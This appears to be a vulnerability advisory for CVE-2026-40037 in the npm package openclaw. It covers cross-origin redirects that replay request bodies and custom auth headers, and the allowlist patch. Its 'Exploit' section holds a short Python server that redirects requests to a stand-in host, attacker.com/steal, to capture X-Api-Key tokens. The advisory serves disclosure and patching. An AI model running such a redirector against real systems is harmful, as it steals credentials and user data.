Listen to this Post
The vulnerability stems from a critical design flaw in the `fetchWithSsrFGuard` function within the OpenClaw gateway. This function is designed to fetch remote resources securely but incorrectly processes HTTP redirects, particularly cross-origin ones. Instead of discarding sensitive request data when a redirect to an external site occurs, the vulnerable function replays the entire original request body and preserves a set of unsafe HTTP headers when following the redirect.
The flawed implementation relies on a narrow denylist to protect only a few specific headers, such as `Authorization` and Cookie. This approach fails to protect against the leakage of custom authentication tokens (e.g., X-Api-Key, Private-Token), which are commonly used for API access, as these are forwarded to the attacker-controlled redirect target. An attacker can exploit this by controlling a server that issues a `302` redirect to a different origin. When the OpenClaw gateway follows this redirect, it will resend the original, potentially unsafe request body and all unblocked headers to the attacker’s endpoint, leading to data exfiltration or SSRF.
The fix was to completely change the security model. The patch switches from a denylist approach to a safe-header allowlist for cross-origin redirects. Under the new model, when a redirect to a different origin occurs, only a predetermined set of benign, standard headers (e.g., Accept, Accept-Language) survive the transition. All other headers, especially any custom or authorization-related ones, are stripped from the redirected request, effectively closing the leak vector. The issue was fixed in commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5` and is included in version 2026.4.8 and later.
dailycve form:
Platform: npm/openclaw
Version: <=2026.4.5
Vulnerability: Request body replay
Severity: Medium (6.5)
date: 2026-04-08
Prediction: 2026-04-08
What Undercode Say:
Analytics
To check if your OpenClaw installation is vulnerable, use the following command to verify the installed version:
npm list -g openclaw
A version number lower than `2026.4.8` indicates the system is affected by CVE-2026-40037. The vulnerability can be analyzed by monitoring network traffic from the OpenClaw process. An attacker-controlled server can be set up to log incoming requests, as shown below, to confirm if sensitive data from the `fetchWithSsrFGuard` function is being leaked.
Exploit:
An attacker would set up a malicious server that responds to any request with a `302 Found` redirect to their own controlled endpoint. For example, using a simple Python HTTP server:
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', 'http://attacker.com/steal')
self.end_headers()
HTTPServer(("", 8080), RedirectHandler).serve_forever()
When the OpenClaw gateway makes a request to this server, it will automatically replay the original request body and headers (including custom `X-Api-Key` tokens) to attacker.com, where they can be logged and stolen.
Protection from this CVE
Immediate Patching: Upgrade OpenClaw to version 2026.4.8 or later immediately. This version contains the fix that switches to a safe-header allowlist for cross-origin redirects.
Code Review: If you are a developer, ensure any custom fetch logic uses an allowlist for headers on cross-origin redirects, as implemented in the patch commit d7c3210.
Network Monitoring: In environments where an immediate upgrade is impossible, monitor outgoing HTTP requests for unexpected redirects to unknown external domains, as these could be signs of an attempted exploit.
Impact
The impact is information disclosure. A successful attack allows a malicious third party to exfiltrate sensitive data from the OpenClaw gateway, including:
Unsafe request bodies that may contain user data or internal commands.
Custom authentication headers (e.g., X-Api-Key, Private-Token) used to access internal APIs.
This can lead to unauthorized access to connected services and compromise of the AI assistant’s operational integrity.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

